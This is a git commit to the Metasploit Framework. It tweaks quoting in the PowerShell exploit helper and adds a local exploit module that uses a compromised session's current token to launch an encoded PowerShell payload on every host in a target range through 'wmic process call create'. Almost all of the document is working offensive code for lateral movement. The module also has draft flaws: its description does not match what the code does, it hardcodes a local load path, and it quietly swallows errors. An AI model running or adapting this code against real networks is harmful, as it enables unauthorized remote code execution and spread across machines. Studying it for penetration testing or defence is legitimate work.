initial

2013-09-20 13:40:28 +01:00 · 2013-09-20 13:40:28 +01:00 · a00f3d8b8e
parent bf0f4a523f
commit a00f3d8b8e
2 changed files with 82 additions and 2 deletions
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@ -116,7 +116,7 @@ module Exploit::Powershell

    ps_wrapper = <<EOS
 $si = New-Object System.Diagnostics.ProcessStartInfo
-$si.FileName = "#{ps_bin}"
+$si.FileName = '#{ps_bin}'
 $si.Arguments = '#{ps_args}'
 $si.UseShellExecute = $false
 $si.RedirectStandardOutput = $true
@ -150,7 +150,7 @@ EOS
    # Wrap in hidden runtime
    psh_payload = run_hidden_psh(psh_payload,ps_bin)
    # Convert to base64 for -encodedcommand execution
-    command = "%COMSPEC% /B /C start powershell.exe -Command \"#{psh_payload.gsub("\n",';').gsub('"','\"')}\"\r\n"
+    command = "%COMSPEC% /B /C start powershell.exe -Command #{psh_payload.gsub("\n",';').gsub('"','\"')}\r\n"
  end

  #
--- a/modules/exploits/windows/local/wmis.rb
+++ b/modules/exploits/windows/local/wmis.rb
@ -0,0 +1,80 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+load '/mnt/hgfs/git/metasploit-framework/lib/msf/core/exploit/powershell.rb'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Post::Common
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'          => 'WMIS via Current User Token',
+        'Description'   => %q{
+          This module uploads an executable file to the victim system, creates
+          a share containing that executable, creates a remote service on each
+          target system using a UNC path to that file, and finally starts the
+          service(s).
+
+          The result is similar to psexec but with the added benefit of using
+          the session's current authentication token instead of having to know
+          a password or hash.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [
+            'Ben',
+          ],
+        'References'    => [
+            # same as for windows/smb/psexec
+            [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
+            [ 'OSVDB', '3106'],
+            [ 'URL', 'http://passing-the-hash.blogspot.co.uk/2013/07/WMIS-PowerSploit-Shells.html' ]
+          ],
+        'DisclosureDate' => 'Jan 01 1999',
+        'Platform'      => [ 'win' ],
+        'SessionTypes'  => [ 'meterpreter' ],
+        'Targets'	=>
+        [
+            [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+            [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+        ],
+        'DefaultTarget' => 0
+      ))
+
+    register_options([
+      OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
+    ])
+  end
+
+  def exploit
+    begin
+      Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
+        begin
+          print_status("#{server.ljust(16)} Creating service #{name}")
+          psh = cmd_psh_payload(payload.encoded).gsub("\r\n","")
+          #psh = "calc"
+          cmd = "cmd /c wmic /node:#{server} process call create \"#{psh}\""
+          vprint_status(cmd)
+          print_warning("Argsize #{cmd.length}") if cmd.length > 4000
+          ps = session.sys.process.execute(cmd[0..2000], cmd[2001..cmd.length-1], {'Hidden' => false, 'Channelized' => false})
+          Sleep(5)
+          ps.process.close
+        rescue
+          next
+        end
+      end
+    end
+
+  end
+
+end
+